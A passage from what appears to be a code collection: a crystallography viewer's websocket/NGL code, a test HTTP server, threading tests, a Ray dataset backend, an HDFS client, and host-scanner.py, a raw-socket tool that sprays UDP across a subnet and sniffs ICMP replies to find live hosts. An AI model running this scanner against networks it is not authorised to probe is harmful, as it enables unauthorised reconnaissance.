"\' + DGR + \'" + ", " + str(roundoff(otherscene.foms[i]) )
else:
od = str(roundoff(otherscene.ampl[i])) + ", " + str(roundoff(otherscene.phases[i]) ) + \
"\' + DGR + \'"
elif self.valid_arrays[j].sigmas() is not None:
od = str(roundoff(odata[i]) ) + ", " + str(roundoff(otherscene.sigmas[i]))
else:
od = str(roundoff(odata[i]) )
if math.isnan( abs(odata[i]) ) or odata[i] == display.inanval:
od = "??"
spbufttip += "\n%s: %s" %(ocolstr, od)
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
positions[ibin].extend( roundoff(list(hklstars)) )
colours[ibin].extend( roundoff(list( colors[i] ), 2) )
radii2[ibin].append( roundoff(radii[i], 2) )
spbufttips[ibin].append(spbufttip)
spherebufferstr = """
ttips = new Array(%d)
positions = new Array(%d)
colours = new Array(%d)
radii = new Array(%d)
spherebufs = new Array(%d)
""" %(self.nbin, self.nbin, self.nbin, self.nbin, self.nbin)
negativeradiistr = ""
cntbin = 0
self.binstrs = []
for ibin in range(self.nbin):
mstr =""
nreflsinbin = len(radii2[ibin])
if (ibin+1) < self.nbin and nreflsinbin > 0:
mstr= "bin:%d, %d reflections with %s in ]%2.2f; %2.2f]" %(cntbin, nreflsinbin, \
colstr, self.workingbinvals[ibin], self.workingbinvals[ibin+1])
self.binstrs.append(mstr)
self.mprint(mstr, verbose=True)
spherebufferstr += """
// %s
ttips[%d] = %s
positions[%d] = new Float32Array( %s )
colours[%d] = new Float32Array( %s )
radii[%d] = new Float32Array( %s )
spherebufs[%d] = new NGL.SphereBuffer({
position: positions[%d],
color: colours[%d],
radius: radii[%d],
picking: ttips[%d],
})
//}, { disableImpostor: true }) // if true allows wireframe spheres but does not allow resizing spheres
shape.addBuffer(spherebufs[%d])
""" %(mstr, cntbin, str(spbufttips[ibin]).replace('\"', '\''), \
cntbin, str(positions[ibin]), cntbin, str(colours[ibin]), \
cntbin, str(radii2[ibin]), cntbin, cntbin, cntbin, cntbin, cntbin, cntbin )
if self.workingbinvals[ibin] < 0.0:
negativeradiistr += "spherebufs[%d].setParameters({metalness: 1})\n" %cntbin
cntbin += 1
spherebufferstr += """
// create tooltip element and add to the viewer canvas
tooltip = document.createElement("div");
Object.assign(tooltip.style, {
display: "none",
position: "absolute",
zIndex: 10,
pointerEvents: "none",
backgroundColor: "rgba(255, 255, 255, 0.75)",
color: "black",
padding: "0.1em",
fontFamily: "sans-serif"
});
stage.viewer.container.appendChild(tooltip);
// listen to `hovered` signal to move tooltip around and change its text
stage.signals.hovered.add(function (pickingProxy) {
if (pickingProxy && (Object.prototype.toString.call(pickingProxy.picker) === '[object Array]' )){
var sphere = pickingProxy.sphere;
var cp = pickingProxy.canvasPosition;
tooltip.innerText = pickingProxy.picker[pickingProxy.pid];
tooltip.style.bottom = cp.y + 7 + "px";
tooltip.style.left = cp.x + 8 + "px";
tooltip.style.fontSize = "smaller";
tooltip.style.display = "block";
}else{
tooltip.style.display = "none";
}
});
stage.signals.clicked.add(function (pickingProxy) {
if (pickingProxy && (Object.prototype.toString.call(pickingProxy.picker) === '[object Array]' )){
var innerText = pickingProxy.picker[pickingProxy.pid];
mysocket.send( innerText);
}
});
"""
colourgradstr = []
for j,val in enumerate(self.colourgradientvalues):
vstr = ""
alpha = 1.0
gradval = "rgba(%s, %s, %s, %s)" %(val[1][0], val[1][1], val[1][2], alpha)
if j%10 == 0:
vstr = str(val[0])
colourgradstr.append([vstr , gradval])
colourgradstr = str(colourgradstr)
#negativeradiistr = ""
#for ibin in range(self.nbin):
# if self.workingbinvals[ibin] < 0.0:
# negativeradiistr += "spherebufs[%d].setParameters({metalness: 1})\n" %ibin
self.NGLscriptstr = """
// Microsoft Edge users follow instructions on
// https://stackoverflow.com/questions/31772564/websocket-to-localhost-not-working-on-microsoft-edge
// to enable websocket connection
var pagename = location.pathname.substring(1);
var mysocket = new WebSocket('ws://127.0.0.1:7894/');
mysocket.onopen = function (e) {
mysocket.send('%s now connected via websocket to ' + pagename + '\\n');
};
mysocket.onclose = function (e) {
mysocket.send('%s now disconnecting from websocket ' + pagename + '\\n');
};
// Log errors to debugger of your browser
mysocket.onerror = function (error) {
console.log('WebSocket Error ' + error);
};
window.addEventListener( 'resize', function( event ){
stage.handleResize();
}, false );
var stage;
var shape;
var shapeComp;
var repr;
var AA = String.fromCharCode(197); // short for angstrom
var DGR = String.fromCharCode(176); // short for degree symbol
function createElement (name, properties, style) {
// utility function used in for loop over colourgradvalarray
var el = document.createElement(name)
Object.assign(el, properties)
Object.assign(el.style, style)
Object.assign(el.style, {
display: "block",
position: "absolute",
color: "black",
fontFamily: "sans-serif",
fontSize: "smaller",
}
)
return el
}
function addElement (el) {
// utility function used in for loop over colourgradvalarray
Object.assign(el.style, {
position: "absolute",
zIndex: 10
})
stage.viewer.container.appendChild(el)
}
var hklscene = function () {
shape = new NGL.Shape('shape');
stage = new NGL.Stage('viewport', { backgroundColor: "grey", tooltip:false,
fogNear: 100, fogFar: 100 });
stage.setParameters( { cameraType: "%s" } );
%s
%s
shapeComp = stage.addComponentFromObject(shape);
repr = shapeComp.addRepresentation('buffer');
shapeComp.autoView();
repr.update()
// if some radii are negative draw them with wireframe
%s
colourgradvalarray = %s
var j;
var ih = 3;
totalheight = ih*colourgradvalarray.length + 10
// make a white box on top of which boxes with transparent background are placed
// containing the colour values at regular intervals
whitebox = createElement("div",
{
innerText: ''
},
{
backgroundColor: 'rgba(255.0, 255.0, 255.0, 1.0)',
color: 'rgba(0.0, 0.0, 0.0, 1.0)',
top: "20px",
left: "20px",
width: "40px",
height: totalheight.toString() + "px",
}
);
addElement(whitebox)
for (j = 0; j < colourgradvalarray.length; j++) {
rgbcol = colourgradvalarray[j][1];
val = colourgradvalarray[j][0]
topv = j*ih + 20
mybox = createElement("div",
{
innerText: ''
},
{
backgroundColor: rgbcol,
top: topv.toString() + "px",
left: "60px",
width: "15px",
height: ih.toString() + "px",
}
);
addElement(mybox)
txtbox = createElement("div",
{
innerText: val
},
{
backgroundColor: 'rgba(255.0, 255.0, 255.0, 0.0)',
color: 'rgba(0.0, 0.0, 0.0, 1.0)',
top: topv.toString() + "px",
left: "20px",
width: "40px",
height: ih.toString() + "px",
}
);
addElement(txtbox)
}
}
document.addEventListener('DOMContentLoaded', function() { hklscene() }, false );
mysocket.onmessage = function (e) {
//alert('Server: ' + e.data);
var c
var alpha
var si
mysocket.send('got ' + e.data ); // tell server what it sent us
try {
val = e.data.split(",")
if (val[0] === "alpha") {
ibin = parseInt(val[1])
alpha = parseFloat(val[2])
spherebufs[ibin].setParameters({opacity: alpha})
stage.viewer.requestRender()
}
if (val[0] === "colour") {
ibin = parseInt(val[1])
si = parseInt(val[2])
colours[ibin][3*si] = parseFloat(val[3])
colours[ibin][3*si+1] = parseFloat(val[4])
colours[ibin][3*si+2] = parseFloat(val[5])
spherebufs[ibin].setAttributes({ color: colours[ibin] })
stage.viewer.requestRender()
}
if (val[0] === "Redraw") {
stage.viewer.requestRender()
}
if (val[0] === "ReOrient") {
mysocket.send( 'Reorienting ' + pagename );
sm = new Float32Array(16);
for (j=0; j<16; j++)
sm[j] = parseFloat(val[j + 2]) // first 2 are "ReOrient", "NGL\\n"
var m = new NGL.Matrix4();
m.fromArray(sm);
stage.viewerControls.orient(m);
stage.viewer.requestRender();
}
if (val[0] === "Reload") {
// refresh browser with the javascript file
cvorient = stage.viewerControls.getOrientation().elements
msg = String(cvorient)
mysocket.send('Current vieworientation:\\n, ' + msg );
mysocket.send( 'Refreshing ' + pagename );
window.location.reload(true);
}
if (val[0] === "Testing") {
// test something new
mysocket.send( 'Testing something new ' + pagename );
var newradii = radii[0].map(function(element) {
return element*1.5;
});
spherebufs[0].setAttributes({
radius: newradii
})
stage.viewer.requestRender()
}
}
catch(err) {
mysocket.send('error: ' + err );
}
};
""" % (self.__module__, self.__module__, self.cameratype, arrowstr, spherebufferstr, \
negativeradiistr, colourgradstr)
if self.jscriptfname:
with open( self.jscriptfname, "w") as f:
f.write( self.NGLscriptstr )
self.ReloadNGL()
def OnConnectWebsocketClient(self, client, server):
self.websockclient = client
self.mprint( "New client:" + str( self.websockclient ) )
def OnWebsocketClientMessage(self, client, server, message):
if message != "":
self.mprint( message)
self.lastmsg = message
if "Current vieworientation:" in message:
# The NGL.Matrix4 with the orientation is a list of floats.
self.viewmtrxelms = message[ message.find("\n") : ]
sleep(0.2)
self.mprint( "Reorienting client after refresh:" + str( self.websockclient ) )
if not self.isnewfile:
self.pendingmessage = u"ReOrient, NGL" + self.viewmtrxelms
self.isnewfile = False
def EmptyMsgQueue(self):
while True:
sleep(1)
if hasattr(self, "pendingmessage") and self.pendingmessage:
self.SendWebSockMsg(self.pendingmessage)
self.pendingmessage = None
def StartWebsocket(self):
self.server = WebsocketServer(7894, host='127.0.0.1')
self.server.set_fn_new_client(self.OnConnectWebsocketClient)
self.server.set_fn_message_received(self.OnWebsocketClientMessage)
self.wst = threading.Thread(target=self.server.run_forever)
self.wst.daemon = True
self.wst.start()
self.msgqueuethrd = threading.Thread(target = self.EmptyMsgQueue )
self.msgqueuethrd.daemon = True
self.msgqueuethrd.start()
def SendWebSockMsg(self, msg):
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
#print "self.server.clients: ", self.server.clients
#print "self.websockclient: ",
if self.websockclient:
while "Refreshing" in self.lastmsg:
sleep(0.5)
self.lastmsg = ""
self.server.send_message(self.websockclient, msg )
else:
self.OpenBrowser()
def SetOpacity(self, bin, alpha):
if bin > self.nbin:
self.mprint( "There are only %d bins of data present" %self.nbin )
return
msg = u"alpha, %d, %f" %(bin, alpha)
self.SendWebSockMsg(msg)
def RedrawNGL(self):
self.SendWebSockMsg( u"Redraw, NGL\n" )
def ReloadNGL(self): # expensive as javascript may be several Mbytes large
self.mprint("Rendering NGL JavaScript...")
self.SendWebSockMsg( u"Reload, NGL\n" )
def OpenBrowser(self):
NGLlibpath = libtbx.env.under_root(os.path.join("modules","cctbx_project","crys3d","hklview","ngl.js") )
htmlstr = self.hklhtml %(NGLlibpath, os.path.abspath( self.jscriptfname))
htmlstr += self.htmldiv
with open(self.hklfname, "w") as f:
f.write( htmlstr )
self.url = "file://" + os.path.abspath( self.hklfname )
self.mprint( "Writing %s and connecting to its websocket client" %self.hklfname )
if self.UseOSBrowser:
webbrowser.open(self.url, new=1)
self.isnewfile = False
def TestNewFunction(self):
self.SendWebSockMsg( u"Testing, NGL\n" )
"""
# python2 code
from websocket_server import WebsocketServer
import threading, math
from time import sleep
nc = {}
def new_client(client, server):
nc = client
print "got a new client:", nc
def on_message(client, server, message):
print message
websocket.enableTrace(True)
server = WebsocketServer(7894, host='127.0.0.1')
server.set_fn_new_client(new_client)
server.set_fn_message_received(on_message)
wst = threading.Thread(target=server.run_forever)
wst.daemon = True
wst.start()
def LoopSendMessages():
x = 0.0
i=0
while server.clients:
nc = server.clients[0]
x += 0.2
alpha = (math.cos(x) +1.0 )/2.0
msg = u"alpha, 2, %f" %alpha
server.send_message(server.clients[0], msg )
r = (math.cos(x) +1.0 )/2.0
g = (math.cos(x+1) +1.0 )/2.0
b = (math.cos(x+2) +1.0 )/2.0
msg = u"colour, 1, %d, %f, %f, %f" %(i,r,g,b)
server.send_message(server.clients[0], msg )
sleep(0.2)
"""
"""
# python3 code
import asyncio
import math
import websockets
async def time(websocket, path):
x = 0
for i in range(1000):
x += 0.2
alpha = (math.cos(x) +1.0 )/2.0
msg = u"alpha, 2, %f" %alpha
await websocket.send( msg )
r = (math.cos(x) +1.0 )/2.0
g = (math.cos(x+1) +1.0 )/2.0
b = (math.cos(x+2) +1.0 )/2.0
msg = u"colour, 1, %d, %f, %f, %f" %(i,r,g,b)
await websocket.send( msg )
message = await websocket.recv()
print( message)
await asyncio.sleep(0.2)
start_server = websockets.serve(time, '127.0.0.1', 7894)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()
"""
|
httpd.py
|
import hashlib
import os
import threading
from http.server import HTTPServer
from RangeHTTPServer import RangeRequestHandler
class TestRequestHandler(RangeRequestHandler):
checksum_header = None
def end_headers(self):
# RangeRequestHandler only sends Accept-Ranges header if Range header
# is present, see https://github.com/danvk/RangeHTTPServer/issues/23
if not self.headers.get("Range"):
self.send_header("Accept-Ranges", "bytes")
# Add a checksum header
if self.checksum_header:
file = self.translate_path(self.path)
if not os.path.isdir(file) and os.path.exists(file):
with open(file, "r") as fd:
encoded_text = fd.read().encode("utf8")
checksum = hashlib.md5(encoded_text).hexdigest()
self.send_header(self.checksum_header, checksum)
RangeRequestHandler.end_headers(self)
class ETagHandler(TestRequestHandler):
checksum_header = "ETag"
class ContentMD5Handler(TestRequestHandler):
checksum_header = "Content-MD5"
class StaticFileServer:
_lock = threading.Lock()
def __init__(self, handler_class=ETagHandler):
self._lock.acquire()
self._httpd = HTTPServer(("localhost", 0), handler_class)
self._thread = None
def __enter__(self):
self._thread = threading.Thread(target=self._httpd.serve_forever)
self._thread.daemon = True
self._thread.start()
return self._httpd
def __exit__(self, *args):
self._httpd.socket.close()
self._httpd.shutdown()
self._httpd.server_close()
self._lock.release()
|
test_threading_local.py
|
import unittest
from doctest import DocTestSuite
from test import test_support
import threading
import weakref
import gc
class Weak(object):
pass
def target(local, weaklist):
weak = Weak()
local.weak = weak
weaklist.append(weakref.ref(weak))
class ThreadingLocalTest(unittest.TestCase):
def test_local_refs(self):
self._local_refs(20)
self._local_refs(50)
self._local_refs(100)
def _local_refs(self, n):
local = threading.local()
weaklist = []
for i in range(n):
t = threading.Thread(target=target, args=(local, weaklist))
t.start()
t.join()
del t
gc.collect()
self.assertEqual(len(weaklist), n)
# XXX threading.local keeps the local of the last stopped thread alive.
deadlist = [weak for weak in weaklist if weak() is None]
self.assertEqual(len(deadlist), n-1)
# Assignment to the same thread local frees it sometimes (!)
local.someothervar = None
gc.collect()
deadlist = [weak for weak in weaklist if weak() is None]
self.assert_(len(deadlist) in (n-1, n), (n, len(deadlist)))
def test_derived(self):
# Issue 3088: if there is a threads switch inside the __init__
# of a threading.local derived class, the per-thread dictionary
# is created but not correctly set on the object.
# The first member set may be bogus.
import time
class Local(threading.local):
def __init__(self):
time.sleep(0.01)
local = Local()
def f(i):
local.x = i
# Simply check that the variable is correctly set
self.assertEqual(local.x, i)
threads= []
for i in range(10):
t = threading.Thread(target=f, args=(i,))
t.start()
threads.append(t)
for t in threads:
t.join()
def test_derived_cycle_dealloc(self):
# http://bugs.python.org/issue6990
class Local(threading.local):
pass
locals = None
passed = [False]
e1 = threading.Event()
e2 = threading.Event()
def f():
# 1) Involve Local in a cycle
cycle = [Local()]
cycle.append(cycle)
cycle[0].foo = 'bar'
# 2) GC the cycle (triggers threadmodule.c::local_clear
# before local_dealloc)
del cycle
gc.collect()
e1.set()
e2.wait()
# 4) New Locals should be empty
passed[0] = all(not hasattr(local, 'foo') for local in locals)
t = threading.Thread(target=f)
t.start()
e1.wait()
# 3) New Locals should recycle the original's address. Creating
# them in the thread overwrites the thread state and avoids the
# bug
locals = [Local() for i in range(10)]
e2.set()
t.join()
self.assertTrue(passed[0])
def test_main():
suite = unittest.TestSuite()
suite.addTest(DocTestSuite('_threading_local'))
suite.addTest(unittest.makeSuite(ThreadingLocalTest))
try:
from thread import _local
except ImportError:
pass
else:
import _threading_local
local_orig = _threading_local.local
def setUp(test):
_threading_local.local = _local
def tearDown(test):
_threading_local.local = local_orig
suite.addTest(DocTestSuite('_threading_local',
setUp=setUp, tearDown=tearDown)
)
test_support.run_unittest(suite)
if __name__ == '__main__':
test_main()
|
host-scanner.py
|
import ipaddress
import os
import socket
import struct
import sys
import threading
import time
SUBNET = '192.168.0.0/24'
# Signature to check in ICMP responses
MESSAGE = 'YAAAAAS'
class IP:
''' The struct module provides format characters to specify the sctructure of the binary data.
We use these format characters to represent the "IP HEADER" '''
def __init__(self, buff=None):
# Unpack the buffer according to the format string:
# "<" : Little-endian (Kali x64)
# "B" : 1-byte, Unsigned char
# "H" : 2-byte, Unsigned short
# "4s" : 4-byte, char[4]
header = struct.unpack('<BBHHHBBH4s4s', buff)
# struct has not format char for a nibble(4-bit):
# For the ver variable, you right-shift the byte by 4 places(append
# 0000) to get the high-order nybble off the first byte
self.ver = header[0] >> 4 # Version
# The header length will take the low-order nybble by using
# the boolean AND with 0xF(00001111)
self.ihl = header[0] & 0xF # IP Header Length
self.tos = header[1] # Type of Service (Priority messages)
self.len = header[2] # Total Length (Includes IP header and subsequent data) <---Might want to modify this header ;)
self.id = header[3] # Identification (Reassembles fragmented packets with this number)
self.offset = header[4] # Fragment Offset (Stitches fragments together)
self.ttl = header[5] # Time-to-live
self.protocol_num = header[6] # Protocol (What header to look for in transport header)
self.sum = header[7] # Header checksum (Integrity) <---Might want to modify this header ;)
self.src = header[8] # Source IP
self.dst = header[9] # Destination IP
# Human readable IP addresses
self.src_address = ipaddress.ip_address(self.src)
self.dst_address = ipaddress.ip_address(self.dst)
# Map protocol constants to their names
self.protocol_map = {1: "ICMP", 6: "TCP", 17: "UDP"}
try:
self.protocol = self.protocol_map[self.protocol_num]
except Exception as e:
print('%s No protocol for %s' % (e,self.protocol_num))
self.protocol = str(self.protocol_num)
class ICMP:
def __init__(self, buff):
header = struct.unpack('<BBHHH', buff)
self.type = header[0] # ICMP Type message number
self.code = header[1] # Code
self.sum = header[2] # Checksum
self.id = header[3] # Identifier
self.seq = header[4] # Sequence number
def udp_sender():
''' Sprays out UDP dragrams with the message chosen to port 65212'''
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sender:
for ip in ipaddress.ip_network(SUBNET).hosts():
sender.sendto(bytes(MESSAGE, 'utf8'), (str(ip), 65212))
class Scanner:
def __init__(self, host):
self.host = host
if os.name == 'nt':
socket_protocol = socket.IPPROTO_IP
else:
socket_protocol = socket.IPPROTO_ICMP
self.socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)
self.socket.bind((host,0))
# Include IP header
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
if os.name == 'nt':
# Turn NIC into a promiscious girl
self.socket.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
def sniff(self):
# store multiple items in a single variable without duplicates
alive_hosts = set([f'{str(self.host)}*'])
try:
while True:
# read a packet
raw_buffer = self.socket.recvfrom(65535)[0]
# create an IP header from the first 20 bytes
ip_header = IP(raw_buffer[0:20])
if ip_header.protocol == "ICMP":
# calculate where our ICMP packet starts in the raw packet.
# IP header ihl field * 32-bit words( 4-byte chunks) = size of IP header
offset = ip_header.ihl * 4
# The last 8 bytes of the IP header contain the ICMP type and code. (https://www.juniper.net/documentation/images/ICMP2.gif)
buf = raw_buffer[offset:offset + 8]
icmp_header = ICMP(buf)
if icmp_header.code == 3 and icmp_header.type == 3:
if ipaddress.ip_address(ip_header.src_address) in ipaddress.IPv4Network(SUBNET):
# Check for MESSAGE
if raw_buffer[len(raw_buffer) - len(MESSAGE):] == bytes(MESSAGE, 'utf8'):
target = str(ip_header.src_address)
if target != self.host and target not in alive_hosts:
alive_hosts.add(str(ip_header.src_address))
print(f'Host Up: {target}')
except KeyboardInterrupt:
if os.name == 'nt':
self.socket.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
print('\nUser Interrupted.')
if alive_hosts:
print(f'\n\nSummary: Hosts up on {SUBNET}')
for host in sorted(alive_hosts):
print(f'{host}')
print('')
sys.exit()
# mypacket = IP(buff)
# print(f'{mypacket.src_address} -> {mypacket.dst_address}')
if __name__ == '__main__':
if len(sys.argv) == 2:
host = sys.argv[1]
else:
host = '192.168.0.24'
# SUBNET = input('Enter the subnet <IP>/<SUBNET>: ')
# # Signature to check in ICMP responses
# MESSAGE = input('Enter the string to send in ICMP requests: ')
host_scan = Scanner(host)
time.sleep(5)
# Opens a thread to avoid interferance with sniffer
t = threading.Thread(target=udp_sender)
t.start()
host_scan.sniff()
|
ray.py
|
#! /usr/bin/env python
# Copyright (c) 2019 Uber Technologies, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import contextlib
import math
import queue
import threading
from distutils.version import LooseVersion
from functools import lru_cache
from typing import Any, Dict, Iterator, Union
import numpy as np
import pandas as pd
import ray
from pyarrow.fs import FSSpecHandler, PyFileSystem
from ray.data import read_parquet
from ray.data.dataset_pipeline import DatasetPipeline
from ray.data.extensions import TensorDtype
from ludwig.backend.base import Backend
from ludwig.constants import BINARY, CATEGORY, NAME, NUMBER, TYPE
from ludwig.data.batcher.base import Batcher
from ludwig.data.dataset.base import Dataset, DatasetManager
from ludwig.utils.data_utils import DATA_TRAIN_HDF5_FP
from ludwig.utils.fs_utils import get_fs_and_path
from ludwig.utils.misc_utils import get_proc_features
from ludwig.utils.types import DataFrame
_ray112 = LooseVersion(ray.__version__) >= LooseVersion("1.12")
_SCALAR_TYPES = {BINARY, CATEGORY, NUMBER}
def read_remote_parquet(path: str):
fs, path = get_fs_and_path(path)
return read_parquet(path, filesystem=PyFileSystem(FSSpecHandler(fs)))
class RayDataset(Dataset):
"""Wrapper around ray.data.Dataset."""
def __init__(
self,
df: Union[str, DataFrame],
features: Dict[str, Dict],
training_set_metadata: Dict[str, Any],
backend: Backend,
):
self.ds = backend.df_engine.to_ray_dataset(df) if not isinstance(df, str) else read_remote_parquet(df)
self.features = features
self.training_set_metadata = training_set_metadata
self.data_hdf5_fp = training_set_metadata.get(DATA_TRAIN_HDF5_FP)
# TODO ray 1.8: convert to Tensors before shuffle
# def to_tensors(df: pd.DataFrame) -> pd.DataFrame:
# for c in features.keys():
# df[c] = df[c].astype(TensorDtype())
# return df
# self.ds = self.ds.map_batches(to_tensors, batch_format="pandas")
def pipeline(self, shuffle=True, fully_executed=True) -> DatasetPipeline:
if not fully_executed and not _ray112:
raise ValueError(f"Cannot set fully_execute=False in ray {ray.__version__}")
if fully_executed and _ray112:
# set instance state so calls to __len__ will also use the fully_executed version
self.ds = self.ds.fully_executed()
pipe = self.ds.repeat()
if shuffle:
pipe = pipe.random_shuffle_each_window()
return pipe
@contextlib.contextmanager
def initialize_batcher(self, batch_size=128, should_shuffle=True, seed=0, ignore_last=False, horovod=None):
yield RayDatasetBatcher(
self.ds.repeat().iter_datasets(),
self.features,
self.training_set_metadata,
batch_size,
self.size,
)
def __len__(self):
return self.ds.count()
@property
def size(self):
return len(self)
class RayDatasetManager(DatasetManager):
def __init__(self, backend):
self.backend = backend
def create(self, dataset: Union[str, DataFrame], config: Dict[str, Any], training_set_metadata: Dict[str, Any]):
return RayDataset(dataset, get_proc_features(config), training_set_metadata, self.backend)
def save(
self,
cache_path: str,
dataset: DataFrame,
config: Dict[str, Any],
training_set_metadata: Dict[str, Any],
tag: str,
):
self.backend.df_engine.to_parquet(dataset, cache_path)
return cache_path
def can_cache(self, skip_save_processed_input):
return not skip_save_processed_input
@property
def data_format(self):
return "parquet"
class RayDatasetShard(Dataset):
def __init__(
self,
dataset_shard: DatasetPipeline,
features: Dict[str, Dict],
training_set_metadata: Dict[str, Any],
):
self.dataset_shard = dataset_shard
self.features = features
self.training_set_metadata = training_set_metadata
self.dataset_iter = dataset_shard.iter_datasets()
@contextlib.contextmanager
def initialize_batcher(self, batch_size=128, should_shuffle=True, seed=0, ignore_last=False, horovod=None):
yield RayDatasetBatcher(
self.dataset_iter,
self.features,
self.training_set_metadata,
batch_size,
self.size,
)
@lru_cache(1)
def __len__(self):
# TODO(travis): find way to avoid calling this, as it's expensive
return next(self.dataset_iter).count()
@property
def size(self):
return len(self)
class RayDatasetBatcher(Batcher):
def __init__(
self,
dataset_epoch_iterator: Iterator[ray.data.Dataset],
features: Dict[str, Dict],
training_set_metadata: Dict[str, Any],
batch_size: int,
samples_per_epoch: int,
):
self.dataset_epoch_iterator = dataset_epoch_iterator
self.batch_size = batch_size
self.samples_per_epoch = samples_per_epoch
self.training_set_metadata = training_set_metadata
self.features = features
self.columns = list(features.keys())
self.reshape_map = {
proc_column: training_set_metadata[feature[NAME]].get("reshape")
for proc_column, feature in features.items()
}
self.dataset_batch_iter = None
self._epoch = 0
self._next_batch = None
self._last_batch = False
self._step = 0
self._fetch_next_epoch()
def next_batch(self):
if self.last_batch():
raise StopIteration()
batch = self._next_batch
self._fetch_next_batch()
self._step += 1
return batch
def last_batch(self):
return self._last_batch
def set_epoch(self, epoch, batch_size):
self.batch_size = batch_size
if epoch != self._epoch:
self._fetch_next_epoch()
self._epoch = epoch
@property
def step(self):
return self._step
@property
def steps_per_epoch(self):
return math.ceil(self.samples_per_epoch / self.batch_size)
def _fetch_next_epoch(self):
dataset = next(self.dataset_epoch_iterator)
read_parallelism = 1
if read_parallelism == 1:
self.dataset_batch_iter = self._create_async_reader(dataset)
elif read_parallelism > 1:
self.dataset_batch_iter = self._create_async_parallel_reader(dataset, read_parallelism)
else:
# TODO: consider removing this. doesn't work currently and read performance seems generally
# very good with 1 parallelism
self.dataset_batch_iter = self._create_sync_reader(dataset)
self._step = 0
self._fetch_next_batch()
def _fetch_next_batch(self):
if self.dataset_batch_iter is None:
self._last_batch = True
return
self._last_batch = False
try:
self._next_batch = next(self.dataset_batch_iter)
except StopIteration:
self._last_batch = True
def _to_tensors_fn(self):
columns = self.columns
features = self.features
def to_tensors(df: pd.DataFrame) -> pd.DataFrame:
for c in columns:
# do not convert scalar columns: https://github.com/ray-project/ray/issues/20825
if features[c][TYPE] not in _SCALAR_TYPES:
df[c] = df[c].astype(TensorDtype())
elif features[c][TYPE] == BINARY:
# TODO(travis): figure out why Ray is converting these into object types by default
df[c] = df[c].astype(np.bool_)
return df
return to_tensors
def _prepare_batch(self, batch: pd.DataFrame) -> Dict[str, np.ndarray]:
res = {c: batch[c].to_numpy() for c in self.columns}
for c in self.columns:
reshape = self.reshape_map.get(c)
if reshape is not None:
res[c] = res[c].reshape((-1, *reshape))
return res
def _create_sync_reader(self, dataset: ray.data.Dataset):
to_tensors = self._to_tensors_fn()
def sync_read():
for batch in dataset.map_batches(to_tensors, batch_format="pandas").iter_batches(
prefetch_blocks=0, batch_size=self.batch_size, batch_format="pandas"
):
yield self._prepare_batch(batch)
return sync_read()
def _create_async_reader(self, dataset: ray.data.Dataset):
q = queue.Queue(maxsize=100)
batch_size = self.batch_size
to_tensors = self._to_tensors_fn()
def producer():
for batch in dataset.map_batches(to_tensors, batch_format="pandas").iter_batches(
prefetch_blocks=0, batch_size=batch_size, batch_format="pandas"
):
res = self._prepare_batch(batch)
q.put(res)
q.put(None)
def async_read():
t = threading.Thread(target=producer)
t.start()
while True:
batch = q.get(block=True)
if batch is None:
break
yield batch
t.join()
return async_read()
def _create_async_parallel_reader(self, dataset: ray.data.Dataset, num_threads: int):
q = queue.Queue(maxsize=100)
batch_size = self.batch_size
to_tensors = self._to_tensors_fn()
splits = dataset.split(n=num_threads)
def producer(i):
for batch in (
splits[i]
.map_batches(to_tensors, batch_format="pandas")
.iter_batches(prefetch_blocks=0, batch_size=batch_size, batch_format="pandas")
):
res = self._prepare_batch(batch)
q.put(res)
q.put(None)
def async_parallel_read():
threads = [threading.Thread(target=producer, args=(i,)) for i in range(num_threads)]
for t in threads:
t.start()
active_threads = num_threads
while True:
batch = q.get(block=True)
if batch is None:
active_threads -= 1
if active_threads == 0:
break
yield batch
for t in threads:
t.join()
return async_parallel_read()
|
hdfs_utils.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""hdfs_utils.py will move to fluid/incubate/fleet/utils/hdfs.py"""
import os
import sys
import subprocess
import multiprocessing
from datetime import datetime
import re
import copy
import errno
import logging
from paddle.fluid.log_helper import get_logger
__all__ = ["HDFSClient", "multi_download", "multi_upload"]
_logger = get_logger(
__name__, logging.INFO, fmt='%(asctime)s-%(levelname)s: %(message)s')
class HDFSClient(object):
"""
A tool of HDFS
Args:
hadoop_home (string): hadoop_home
configs (dict): hadoop config, it is a dict, please contain \
key "fs.default.name" and "hadoop.job.ugi"
Can be a float value
Examples:
hadoop_home = "/home/client/hadoop-client/hadoop/"
configs = {
"fs.default.name": "hdfs://xxx.hadoop.com:54310",
"hadoop.job.ugi": "hello,hello123"
}
client = HDFSClient(hadoop_home, configs)
client.ls("/user/com/train-25")
files = client.lsr("/user/com/train-25/models")
"""
def __init__(self, hadoop_home, configs):
self.pre_commands = []
hadoop_bin = '%s/bin/hadoop' % hadoop_home
self.pre_commands.append(hadoop_bin)
dfs = 'fs'
self.pre_commands.append(dfs)
for k, v in configs.iteritems():
config_command = '-D%s=%s' % (k, v)
self.pre_commands.append(config_command)
def __run_hdfs_cmd(self, commands, retry_times=5):
whole_commands = copy.deepcopy(self.pre_commands)
whole_commands.extend(commands)
print('Running system command: {0}'.format(' '.join(whole_commands)))
ret_code = 0
ret_out = None
ret_err = None
whole_commands = " ".join(whole_commands)
for x in range(retry_times + 1):
proc = subprocess.Popen(
whole_commands,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
(output, errors) = proc.communicate()
